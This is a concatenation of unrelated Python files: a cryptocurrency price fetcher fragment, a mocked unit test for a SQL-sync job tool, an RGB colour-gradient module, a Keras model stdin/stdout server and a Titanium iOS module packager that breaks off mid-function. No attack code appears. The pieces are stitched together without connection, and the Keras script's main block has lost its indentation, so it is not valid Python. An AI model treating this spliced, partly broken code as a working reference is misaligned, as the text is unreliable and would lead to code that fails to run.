        BATCH_SIZE = 4  # API is queried a few symbols at a time
        todo = currencies[:]
        while todo:
            batch = todo[:BATCH_SIZE]
            todo = todo[BATCH_SIZE:]
            rates = self._get_exchanges_now(translations.get(coin, coin)
                                            for coin in batch)
            # Map API symbols back to our symbols before storing.
            self.update({translations_r.get(coin, coin): v
                         for coin, v in rates.iteritems()})
        # Fill in any symbols the API did not return.
        for coin in set(backup_rates) - set(self.keys()):
            self[coin] = backup_rates[coin]

    @staticmethod
    def _get_exchanges_now(currencies):
        """Return the current USD rates for `currencies` as a dict."""
        url_current = ("https://min-api.cryptocompare.com/data/price"
                       "?fsym=USD&tsyms=%s" % (",".join(currencies)))
        return requests.get(url_current).json()

    @staticmethod
    def _get_exchanges_at(at, currencies):
        '''
        Historical USD rates at datetime `at` (UTC).
        Usage: self._get_exchanges_at(datetime.datetime.utcnow(), batch)
        '''
        ts = calendar.timegm(at.utctimetuple())
        url_historical = ("https://min-api.cryptocompare.com/data/pricehisto"
                          "rical?fsym=USD&tsyms=%s&ts=%d" %
                          (",".join(currencies), ts))
        return requests.get(url_historical).json()['USD']
|
"""
Copyright 2021 Merck & Co., Inc. Kenilworth, NJ, USA.
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from dataprofiler.job_api import Job, JobType, JobStatus, TableLoadDetail, SqlSyncDetail, BulkIngestAndCommitDetail
from dataprofiler.table_mapper_api import Table
from dataprofiler.tools.auto_sql_syncker import run_sql_sync_for_commit
def test_run_sql_sync_for_commit(mocker):
    """Unit test for run_sql_sync_for_commit.

    Mocks Config, the job and table APIs, and the rerunner, then builds a
    mix of matching and non-matching table-load and sql-sync jobs and
    invokes run_sql_sync_for_commit for a commit carrying the target
    metadata version.
    """
    mocked_config = mocker.patch('dataprofiler.tools.auto_sql_syncker.Config')
    mocked_japi = mocker.patch('dataprofiler.tools.auto_sql_syncker.JobApi.jobs')
    mocked_tapi = mocker.patch('dataprofiler.tools.auto_sql_syncker.TableMapperApi.tables_like')
    mocked_reruner = mocker.patch('dataprofiler.tools.auto_sql_syncker.run_list_sql_sync_from_details')
    faked_api = 'http://localhost/testtest'
    faked_env = 'testtesttest'
    faked_user = 'test123'
    target_md_version = 'testtesttesttesttest'
    target_datsetname = 'camtest'  # NOTE(review): "datset" typo kept intentionally (cosmetic)
    target_tablename = 'testcam'
    mocked_config.environment = faked_api
    # Job Api
    # 1) Call to table loads
    # 2) Call to sql syncs
    table_load1 = Job(faked_api) # matches all criteria for a run
    table_load1.id = 1
    table_load1.type = JobType.TABLE_LOAD
    table_load1.status = JobStatus.COMPLETE
    table_load1.environment = faked_env
    table_load1.creating_user = faked_user
    table_load1.details = TableLoadDetail.from_json(1, {
        'datasetName': target_datsetname,
        'tableName': target_tablename,
        'metadataVersion': target_md_version,
    })
    table_load2 = Job(faked_api)  # matches none of the targets
    table_load2.id = 2
    table_load2.type = JobType.TABLE_LOAD
    table_load2.status = JobStatus.COMPLETE
    table_load2.environment = faked_env
    table_load2.creating_user = faked_user
    table_load2.details = TableLoadDetail.from_json(2, {
        'datasetName': 'notcamtest',
        'tableName': 'nottestcam',
        'metadataVersion': 'nottest',
    })
    table_load3 = Job(faked_api) # Matches metadata version and dataset name
    table_load3.id = 3
    table_load3.type = JobType.TABLE_LOAD
    table_load3.status = JobStatus.COMPLETE
    table_load3.environment = faked_env
    table_load3.creating_user = faked_user
    table_load3.details = TableLoadDetail.from_json(3, {
        'datasetName': target_datsetname,
        'tableName': 'some_table',
        'metadataVersion': target_md_version,
    })
    sql_sync1 = Job(faked_api) # Matches sql sync completely
    sql_sync1.id = 4
    sql_sync1.type = JobType.SQLSYNC
    sql_sync1.status = JobStatus.COMPLETE
    sql_sync1.environment = faked_env
    sql_sync1.creating_user = faked_user
    sql_sync1.details = SqlSyncDetail.from_json(4, {
        'downloads': [{
            'dataset': target_datsetname,
            'table': target_tablename,
            'timestamp_format': 'dd MMM yyy hh:mm:ssa',
            'date_format': 'dd MMMyyy'
        }],
        'jdbcConnection': {
            'url': 'jdbc:redshift://localhost',
            'user': 'test',
            'passwd': 'a'
        },
        'visibilities': ['LIST.PUBLIC_DATA'],
        'externalUsers': ['testman']
    })
    sql_sync2 = Job(faked_api)  # non-matching dataset/table
    sql_sync2.id = 5
    sql_sync2.type = JobType.SQLSYNC
    sql_sync2.status = JobStatus.COMPLETE
    sql_sync2.environment = faked_env
    sql_sync2.creating_user = faked_user
    sql_sync2.details = SqlSyncDetail.from_json(5, {
        'downloads': [{
            'dataset': 'notcamtest',
            'table': 'nottestcam',
            'timestamp_format': 'dd MMM yyy hh:mm:ssa',
            'date_format': 'dd MMMyyy'
        }],
        'jdbcConnection': {
            'url': 'jdbc:redshift://localhost',
            'user': 'test',
            'passwd': 'a'
        },
        'visibilities': ['LIST.PUBLIC_DATA'],
        'externalUsers': ['testman']
    })
    sql_sync3 = Job(faked_api) # Matches sql sync completely, later timestamp!
    # NOTE(review): id 5 duplicates sql_sync2's id — presumably intentional
    # (models a rerun of the same sync); confirm.
    sql_sync3.id = 5
    sql_sync3.type = JobType.SQLSYNC
    sql_sync3.status = JobStatus.COMPLETE
    sql_sync3.environment = faked_env
    sql_sync3.creating_user = faked_user
    sql_sync3.details = SqlSyncDetail.from_json(5, {
        'downloads': [{
            'dataset': target_datsetname,
            'table': target_tablename,
            'timestamp_format': 'dd MMM yyy hh:mm:ssa',
            'date_format': 'dd MMMyyy'
        }],
        'jdbcConnection': {
            'url': 'jdbc:redshift://localhost',
            'user': 'test',
            'passwd': 'a'
        },
        'visibilities': ['LIST.PUBLIC_DATA'],
        'externalUsers': ['testman']
    })
    sql_sync4 = Job(faked_api) # Matches but with different table name
    sql_sync4.id = 6
    sql_sync4.type = JobType.SQLSYNC
    sql_sync4.status = JobStatus.COMPLETE
    sql_sync4.environment = faked_env
    sql_sync4.creating_user = faked_user
    sql_sync4.details = SqlSyncDetail.from_json(6, {
        'downloads': [{
            'dataset': target_datsetname,
            'table': 'some_table',
            'timestamp_format': 'dd MMM yyy hh:mm:ssa',
            'date_format': 'dd MMMyyy'
        }],
        'jdbcConnection': {
            'url': 'jdbc:redshift://localhost/a',
            'user': 'test',
            'passwd': 'a'
        },
        'visibilities': ['LIST.PUBLIC_DATA'],
        'externalUsers': ['testman']
    })
    # First jobs() call returns the table loads, second the sql syncs.
    mocked_japi.side_effect = iter([(table_load2,table_load1, table_load3), (sql_sync1, sql_sync2, sql_sync3, sql_sync4)])
    # Table Api: Called per value in download of sql sync detail
    table1 = Table(faked_api)
    table1.id = 1
    table1.environment = faked_env
    table1.dataset_name = target_datsetname
    table1.table_name = target_tablename
    table1.enabled = True
    table2 = Table(faked_api)
    table2.id = 2
    table2.environment = faked_env
    table2.dataset_name = target_datsetname
    table2.table_name = 'some_table'
    table2.enabled = True
    mocked_tapi.return_value = [table1, table2]
    #mocked_tapi.side_effect = iter([(table1, table2)])
    mocked_reruner.return_value = 2 # Used with the debug output, may not be representative of it actually working
    # Commit under test carries only the target metadata version.
    test_commit = Job(faked_api)
    test_commit.details = BulkIngestAndCommitDetail.from_json(0, {
        'metadataVersion': target_md_version
    })
    run_sql_sync_for_commit(test_commit)
    #assert False uncomment for debug output
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
"""
Interpolate between colours in RGB space; make continuous colour maps.
Definition
----------
Calculates colour between two given colors in RGB space
def rgb_blend(col1, col2, fraction=0.5):
n interpolated colours between two colours in RGB space
def rgb_range(col1, col2, n=255, cmap=None, pow=1):
n interpolated colours in RGB space between several colours changing
at certain fractions
def rgb_gradient(colours, fractions, n=255, cmap=None):
Input
-----
rgb_blend
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
rgb_range
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
rgb_gradient
colours Nx3 array like of colour tuples
fractions N array like of fractions for blending between colours
Optional Input
--------------
rgb_blend
fraction fraction between 0=col1 and 1=col2; default: 0.5
rgb_range
n number of interpolated colours with first colour=col1 and
last colour=col2; default: 255
cmap if given, register colour map under that name
pow 1 (default) is linear interpolation
>1 remains longer near col1, i.e. higher values are detailed
<1 remains longer near col2, i.e. lower values are detailed
rgb_gradient
n number of interpolated colours with first colour=first colour
in colours and last colour=last colour in colours; default: 255
cmap if given, register colour map under that name
Output
------
rgb_blend rgb tuple
rgb_range list of rgb tuples
rgb_gradient list of rgb tuples
Examples
--------
>>> r = (1.0,0.0,0.0)
>>> b = (0.0,0.0,1.0)
>>> print(rgb_blend(r,b,0.0), rgb_blend(r,b,0.5), rgb_blend(r,b,1.0))
(1.0, 0.0, 0.0) (0.5, 0.0, 0.5) (0.0, 0.0, 1.0)
>>> print(rgb_range(r,b,3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_range(r,b,3,pow=2))
[(1.0, 0.0, 0.0), (0.75, 0.0, 0.25), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,b],[0.0,1.0],3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5, cmap='MyGradient'))
[(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]
License
-------
This file is part of the JAMS Python package, distributed under the MIT
License. The JAMS Python package originates from the former UFZ Python library,
Department of Computational Hydrosystems, Helmholtz Centre for Environmental
Research - UFZ, Leipzig, Germany.
Copyright (c) 2013-2021 Matthias Cuntz - mc (at) macu (dot) de
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
History
-------
Written, Matthias Cuntz, Apr 2013
Modified, Matthias Cuntz, Sep 2021 - code refactoring
"""
import numpy as np
import jams.const as const
__all__ = ['rgb_blend', 'rgb_gradient', 'rgb_range']
# ---------------------------------------------------------------------
# http://stackoverflow.com/questions/25007/conditional-formatting-percentage-to-color-conversion
def rgb_blend(col1, col2, fraction=0.5):
    """
    Channel-wise linear interpolation between two RGB colours.

    `fraction` = 0 gives col1, 1 gives col2; each channel is computed as
    c1 + (c2-c1)*fraction.

    Examples
    --------
    >>> r = (1.0,0.0,0.0)
    >>> b = (0.0,0.0,1.0)
    >>> print(rgb_blend(r,b,0.0), rgb_blend(r,b,0.5), rgb_blend(r,b,1.0))
    (1.0, 0.0, 0.0) (0.5, 0.0, 0.5) (0.0, 0.0, 1.0)

    History
    -------
    Written, Matthias Cuntz, Apr 2013
    """
    blended = []
    for chan1, chan2 in zip(col1, col2):
        blended.append(chan1 + (chan2 - chan1) * fraction)
    return tuple(blended)
# ---------------------------------------------------------------------
def rgb_range(col1, col2, n=255, cmap=None, pow=1):
    """
    List of n colours interpolated between col1 and col2 in RGB space.

    The first colour is col1 and the last is col2. `pow` warps the
    interpolation parameter: >1 stays longer near col1 (detail at high
    values), <1 stays longer near col2. If `cmap` is given, the list is
    additionally registered as a matplotlib colour map under that name.

    Examples
    --------
    >>> r = (1.0,0.0,0.0)
    >>> b = (0.0,0.0,1.0)
    >>> print(rgb_range(r,b,3))
    [(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
    >>> print(rgb_range(r,b,3,pow=2))
    [(1.0, 0.0, 0.0), (0.75, 0.0, 0.25), (0.0, 0.0, 1.0)]

    History
    -------
    Written, Matthias Cuntz, Apr 2013
    """
    last = float(n - 1)
    colr = []
    for step in range(n):
        frac = (float(step) / last) ** pow
        colr.append(rgb_blend(col1, col2, frac))
    if cmap is not None:
        # Deferred import: matplotlib only needed when registering a cmap.
        import matplotlib.colors as col
        import matplotlib.cm as cm
        iscmap = col.ListedColormap(colr, name=cmap, N=n)
        cm.register_cmap(name=cmap, cmap=iscmap)
    return colr
# ---------------------------------------------------------------------
def rgb_gradient(colours, fractions, n=255, cmap=None):
    """
    n interpolated colours between several colours changing at certain
    fractions.

    Input
    -----
    colours      Nx3 array like of colour tuples
    fractions    N array like of (sorted, increasing) fractions in [0, 1]
                 at which each colour is reached

    Optional Input
    --------------
    n            number of interpolated colours with first colour=first
                 colour in colours and last colour=last colour in colours;
                 default: 255
    cmap         if given, register colour map under that name

    Output
    ------
    rgb_gradient    list of rgb tuples

    Raises
    ------
    ValueError   if colours and fractions have different lengths

    Examples
    --------
    >>> r = (1.0,0.0,0.0)
    >>> b = (0.0,0.0,1.0)
    >>> print(rgb_gradient([r,b],[0.0,1.0],3))
    [(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
    >>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5))
    [(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]
    >>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5, cmap='MyGradient'))
    [(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]

    History
    -------
    Written, Matthias Cuntz, Apr 2013
    """
    cols = np.array(colours)
    fracs = np.array(fractions)
    if cols.shape[0] != fracs.size:
        raise ValueError('colours.shape[0] != fractions.size')
    colors = []
    for i in range(n):
        frac = float(i)/float(n-1)
        if frac <= fracs[0]:    # before the first fraction
            colors += [tuple(cols[0, :])]
        elif frac >= fracs[-1]:  # after the last fraction
            colors += [tuple(cols[-1, :])]
        else:
            # first anchor at or beyond frac; fracs[ii-1] < frac <= fracs[ii]
            ii = np.where(fracs >= frac)[0][0]
            if np.abs(fracs[ii]-frac) > const.eps:  # strictly between two anchors
                # BUG FIX: blend by frac's position WITHIN the segment
                # [fracs[ii-1], fracs[ii]] instead of the global fraction,
                # so unevenly spaced anchors interpolate continuously.
                fr = (frac - fracs[ii-1]) / (fracs[ii] - fracs[ii-1])
                colors += [rgb_blend(cols[ii-1, :], cols[ii, :], fr)]
            else:                                   # exactly on an anchor
                colors += [tuple(cols[ii, :])]
    if cmap is not None:
        import matplotlib.colors as col
        import matplotlib.cm as cm
        iscmap = col.ListedColormap(colors, name=cmap, N=n)
        cm.register_cmap(name=cmap, cmap=iscmap)
    return colors
# ---------------------------------------------------------------------
if __name__ == '__main__':
    # Run the doctests embedded in the functions above.
    import doctest
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)

    # Manual spot checks kept for reference:
    # r = (1.0,0.0,0.0)
    # b = (0.0,0.0,1.0)
    # print(rgb_blend(r,b,0), rgb_blend(r,b,0.1), rgb_blend(r,b,0.2), rgb_blend(r,b,0.3),
    #       rgb_blend(r,b,0.4), rgb_blend(r,b,0.5), rgb_blend(r,b,0.6), rgb_blend(r,b,0.7),
    #       rgb_blend(r,b,0.8), rgb_blend(r,b,0.9), rgb_blend(r,b,1))
    # print(rgb_range(r,b,11))
    # print(rgb_gradient([r,b],[0,1],11))
    # print(rgb_gradient([r,r,b,b],[0,0.4,0.6,1],11))
    # print(rgb_gradient([r,r,b,b],[0,0.3,0.7,1],11))
    # print(rgb_range(r,b,11))
    # print(rgb_range(r,b,11, pow=3))
    # print(rgb_range(r,b,11, pow=0.3))
|
#!/usr/bin/env python3
# TODO: why are the keras models saved with python 2?
from __future__ import print_function
import tensorflow as tf
import os
import sys
import tensorflow.keras as keras
import numpy as np
from tensorflow.keras.models import Model
from tensorflow.keras.models import load_model
def read(sz):
    """Read exactly `sz` float32 values from stdin (fd 0).

    Blocks until sz*4 bytes have arrived; raises AssertionError on EOF
    before the full payload is received. Returns a 1-D float32 numpy array.
    """
    chunks = []
    got = 0
    while got < sz*4:
        st = os.read(0, sz*4 - got)
        assert(len(st) > 0)  # zero-length read means EOF mid-message
        chunks.append(st)
        got += len(st)
    # BUG FIX: np.fromstring is deprecated for binary input;
    # np.frombuffer is the supported equivalent for bytes.
    return np.frombuffer(b''.join(chunks), dtype=np.float32)
def write(d):
    # Serialize the numpy array to raw bytes and write them to stdout (fd 1).
    os.write(1, d.tobytes())
def run_loop(m):
    """Serve model `m` forever: read one flat input vector from stdin,
    run it through the model, write the flat output vector to stdout.
    """
    isize = m.inputs[0].shape[1]   # flattened input width
    osize = m.outputs[0].shape[1]  # flattened output width
    print("ready to run keras model %d -> %d" % (isize, osize), file=sys.stderr)
    while 1:
        idata = read(isize).reshape((1, isize))
        ret = m.predict_on_batch(idata)
        write(ret)
if __name__ == "__main__":
print(tf.__version__, file=sys.stderr)
# limit gram alloc
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
tf.config.experimental.set_virtual_device_configuration(gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=2048)])
m = load_model(sys.argv[1])
print(m, file=sys.stderr)
bs = [int(np.product(ii.shape[1:])) for ii in m.inputs]
ri = keras.layers.Input((sum(bs),))
tii = []
acc = 0
for i, ii in enumerate(m.inputs):
print(ii, file=sys.stderr)
ti = keras.layers.Lambda(lambda x: x[:,acc:acc+bs[i]], output_shape=(1, bs[i]))(ri)
acc += bs[i]
tr = keras.layers.Reshape(ii.shape[1:])(ti)
tii.append(tr)
no = keras.layers.Concatenate()(m(tii))
m = Model(inputs=ri, outputs=[no])
run_loop(m)
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
# Resolve the module directory from this file's own location and work there.
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
# Manifest keys every module must define.
# BUG FIX: 'copyright' was listed twice; the duplicate is removed.
required_module_keys = ['name','version','moduleid','description','copyright','license','platform','minsdk']
# Defaults applied when the manifest omits a key.
module_defaults = {
    'description':'Couchbase Lite',
    'author': 'Couchbase, Inc.',
    'license' : 'Specify your license',
    'copyright' : 'Copyright (c) %s by Couchbase, Inc.' % str(date.today().year),
}
# Fallback LICENSE text bundled when the module ships none of its own.
module_license_default = """COUCHBASE INC. COMMUNITY EDITION LICENSE AGREEMENT
IMPORTANT-READ CAREFULLY: BY CLICKING THE "I ACCEPT" BOX OR INSTALLING,
DOWNLOADING OR OTHERWISE USING THIS SOFTWARE AND ANY ASSOCIATED
DOCUMENTATION, YOU, ON BEHALF OF YOURSELF OR AS AN AUTHORIZED
REPRESENTATIVE ON BEHALF OF AN ENTITY ("LICENSEE") AGREE TO ALL THE
TERMS OF THIS COMMUNITY EDITION LICENSE AGREEMENT (THE "AGREEMENT")
REGARDING YOUR USE OF THE SOFTWARE. YOU REPRESENT AND WARRANT THAT YOU
HAVE FULL LEGAL AUTHORITY TO BIND THE LICENSEE TO THIS AGREEMENT. IF YOU
DO NOT AGREE WITH ALL OF THESE TERMS, DO NOT SELECT THE "I ACCEPT" BOX
AND DO NOT INSTALL, DOWNLOAD OR OTHERWISE USE THE SOFTWARE. THE
EFFECTIVE DATE OF THIS AGREEMENT IS THE DATE ON WHICH YOU CLICK "I
ACCEPT" OR OTHERWISE INSTALL, DOWNLOAD OR USE THE SOFTWARE.
1. License Grant. Couchbase Inc. hereby grants Licensee, free of charge,
the non-exclusive right to use, copy, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to
whom the Software is furnished to do so, subject to Licensee including
the following copyright notice in all copies or substantial portions of
the Software:
Couchbase (r) http://www.Couchbase.com Copyright 2013 Couchbase, Inc.
As used in this Agreement, "Software" means the object code version of
the applicable elastic data management server software provided by
Couchbase Inc.
2. Restrictions. Licensee will not reverse engineer, disassemble, or
decompile the Software (except to the extent such restrictions are
prohibited by law).
3. Support. Couchbase, Inc. will provide Licensee with access to, and
use of, the Couchbase, Inc. support forum available at the following
URL: http://www.couchbase.org/forums/. Couchbase, Inc. may, at its
discretion, modify, suspend or terminate support at any time upon notice
to Licensee.
4. Warranty Disclaimer and Limitation of Liability. THE SOFTWARE IS
PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
COUCHBASE INC. OR THE AUTHORS OR COPYRIGHT HOLDERS IN THE SOFTWARE BE
LIABLE FOR ANY CLAIM, DAMAGES (IINCLUDING, WITHOUT LIMITATION, DIRECT,
INDIRECT OR CONSEQUENTIAL DAMAGES) OR OTHER LIABILITY, WHETHER IN AN
ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
def find_sdk(config):
    """Return the configured Titanium SDK path with ~ and $VARS expanded."""
    raw_path = config['TITANIUM_SDK']
    home_expanded = os.path.expanduser(raw_path)
    return os.path.expandvars(home_expanded)
def replace_vars(config, token):
    """Expand $(KEY) placeholders in *token* using values from *config*.

    Expansion proceeds left to right and stops at the first placeholder
    that is unterminated or whose key is not in *config* (preserving the
    original early-exit behaviour).  Returns the (possibly partially)
    expanded string.
    """
    idx = token.find('$(')
    while idx != -1:
        idx2 = token.find(')', idx + 2)
        if idx2 == -1:
            break  # unterminated placeholder: stop expanding
        key = token[idx + 2:idx2]
        # Fix: dict.has_key() was removed in Python 3; 'in' works in 2 and 3.
        if key not in config:
            break
        token = token.replace('$(%s)' % key, config[key])
        idx = token.find('$(')
    return token
def read_ti_xcconfig():
    """Parse titanium.xcconfig into a dict, expanding $(VAR) references.

    Lines starting with '//' are comments; every 'KEY = VALUE' line is
    recorded, with VALUE run through replace_vars() against the keys
    parsed so far (so later lines may reference earlier ones).
    """
    # Fix: use a context manager so the file handle is closed
    # deterministically (the original leaked the handle from open()).
    with open(os.path.join(cwd, 'titanium.xcconfig')) as fh:
        contents = fh.read()
    config = {}
    for line in contents.splitlines(False):
        line = line.strip()
        if line[0:2] == '//':
            continue
        idx = line.find('=')
        if idx > 0:
            key = line[0:idx].strip()
            value = line[idx + 1:].strip()
            config[key] = replace_vars(config, value)
    return config
def generate_doc(config):
    """Render every markdown file under documentation/ to HTML.

    Returns a list of one-entry {filename: html} dicts, or None when the
    documentation directory does not exist.  Prefers markdown2 when
    installed, falling back to markdown.
    """
    docdir = os.path.join(cwd, 'documentation')
    if not os.path.exists(docdir):
        # Fix: print as a function works in both Python 2 and 3.
        print("Couldn't find documentation file at: %s" % docdir)
        return None
    try:
        import markdown2 as markdown
    except ImportError:
        import markdown
    documentation = []
    for file in os.listdir(docdir):
        if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
            continue
        # Fix: context manager closes the handle (the original leaked it).
        with open(os.path.join(docdir, file)) as fh:
            md = fh.read()
        html = markdown.markdown(md)
        documentation.append({file: html})
    return documentation
def compile_js(manifest,config):
    """Compile the module's CommonJS JavaScript into the native assets router.

    Skips silently when assets/com.couchbase.cbl.js does not exist.
    Otherwise compiles the JS with the Titanium SDK's Compiler, splices the
    generated byte arrays into ComCouchbaseCblModuleAssets.m, and writes the
    crawled JS exports to metadata.json for the packager.

    NOTE(review): Compiler and splice_code come from the Titanium SDK paths
    appended to sys.path in __main__ — this must run after find_sdk().
    """
    js_file = os.path.join(cwd,'assets','com.couchbase.cbl.js')
    if not os.path.exists(js_file): return
    from compiler import Compiler
    # json is stdlib on modern Pythons; simplejson is the fallback for
    # ancient interpreters that lack it.
    try:
        import json
    except:
        import simplejson as json
    compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
    root_asset, module_assets = compiler.compile_module()
    # Objective-C snippets spliced into the assets router; %s receives the
    # compiler-generated data tables.
    root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
    module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
    from tools import splice_code
    assets_router = os.path.join(cwd,'Classes','ComCouchbaseCblModuleAssets.m')
    splice_code(assets_router, 'asset', root_asset_content)
    splice_code(assets_router, 'resolve_asset', module_asset_content)
    # Generate the exports after crawling all of the available JS source
    exports = open('metadata.json','w')
    json.dump({'exports':compiler.exports }, exports)
    exports.close()
def die(msg):
    """Print *msg* and abort the build with exit status 1."""
    # Fix: print() with a single argument is valid in Python 2 and 3.
    print(msg)
    sys.exit(1)
def warn(msg):
    """Print a non-fatal [WARN]-prefixed message to stdout."""
    # Fix: print() with a single argument is valid in Python 2 and 3.
    print("[WARN] %s" % msg)
def validate_license():
    """Warn when ../LICENSE still contains the stock Couchbase license text.

    Compares the shipped LICENSE file against module_license_default; a
    match means the author never customized it.
    """
    # Fix: context manager instead of a leaked open().read() handle.
    with open(os.path.join(cwd, '../LICENSE')) as fh:
        c = fh.read()
    if c.find(module_license_default) != -1:
        warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
    """Parse and sanity-check the module manifest.

    Returns (manifest_dict, manifest_path).  Dies when the file is missing
    or a required key is absent; warns when a key still holds its
    generated default value.
    """
    path = os.path.join(cwd, 'manifest')
    # Fix: check existence BEFORE opening. The original called open(path)
    # first, so a missing manifest raised IOError instead of reaching the
    # friendly die() message.
    if not os.path.exists(path):
        die("missing %s" % path)
    manifest = {}
    with open(path) as f:
        for line in f.readlines():
            line = line.strip()
            if line[0:1] == '#':
                continue
            if line.find(':') < 0:
                continue
            # Fix: split only on the first ':' so values containing colons
            # (e.g. URLs) don't raise "too many values to unpack".
            key, value = line.split(':', 1)
            manifest[key.strip()] = value.strip()
    for key in required_module_keys:
        # Fix: dict.has_key() is Python-2-only; 'in' works in 2 and 3.
        if key not in manifest:
            die("missing required manifest key '%s'" % key)
        if key in module_defaults:
            defvalue = module_defaults[key]
            curvalue = manifest[key]
            if curvalue == defvalue:
                warn("please update the manifest key: '%s' to a non-default value" % key)
    return manifest, path
# File and directory names excluded from packaging (zip_dir) and from the
# documentation scan (generate_doc).
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf, dir, basepath, ignoreExt=None):
    """Recursively add *dir* to the open ZipFile *zf* under basepath/dir.

    Entries listed in the module-level ignoreFiles/ignoreDirs are skipped,
    as is any file whose extension appears in *ignoreExt*.

    Fix: ignoreExt defaults to None instead of a mutable [] default (the
    classic shared-default pitfall); behaviour is unchanged.
    """
    if ignoreExt is None:
        ignoreExt = []
    if not os.path.exists(dir):
        return
    for root, dirs, files in os.walk(dir):
        for name in ignoreDirs:
            if name in dirs:
                dirs.remove(name)  # don't visit ignored directories
        for file in files:
            if file in ignoreFiles:
                continue
            # splitext always returns a 2-tuple; only the extension matters
            if os.path.splitext(file)[1] in ignoreExt:
                continue
            from_ = os.path.join(root, file)
            to_ = from_.replace(dir, '%s/%s' % (basepath, dir), 1)
            zf.write(from_, to_)
def glob_libfiles():
    """Collect every Release-configuration static library under build/."""
    return [candidate
            for candidate in glob.glob('build/**/*.a')
            if candidate.find('Release-') != -1]
def build_module(manifest, config):
    """Run xcodebuild for device and simulator, then merge the resulting
    static libraries into build/lib<moduleid>.a with lipo."""
    from tools import ensure_dev_path
    ensure_dev_path()
    # Build both SDK flavours; abort on the first failure.
    for build_cmd in ("xcodebuild -sdk iphoneos -configuration Release",
                      "xcodebuild -sdk iphonesimulator -configuration Release"):
        if os.system(build_cmd) != 0:
            die("xcodebuild failed")
    # Merge every Release .a produced above into one fat library.
    moduleid = manifest['moduleid']
    libpaths = ''.join('%s ' % libfile for libfile in glob_libfiles())
    os.system("lipo %s -create -output build/lib%s.a" % (libpaths, moduleid))
def package_module(manifest, mf, config):
    """Assemble the distributable <moduleid>-iphone-<version>.zip.

    Bundles the manifest, the fat static library, rendered documentation,
    the assets/example/platform directories, LICENSE, module.xcconfig and
    the JS-exports metadata.json (when present).
    """
    moduleid = manifest['moduleid'].lower()
    version = manifest['version']
    modulezip = '%s-iphone-%s.zip' % (moduleid, version)
    if os.path.exists(modulezip):
        os.remove(modulezip)
    zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
    modulepath = 'modules/iphone/%s/%s' % (moduleid, version)
    zf.write(mf, '%s/manifest' % modulepath)
    libname = 'lib%s.a' % moduleid
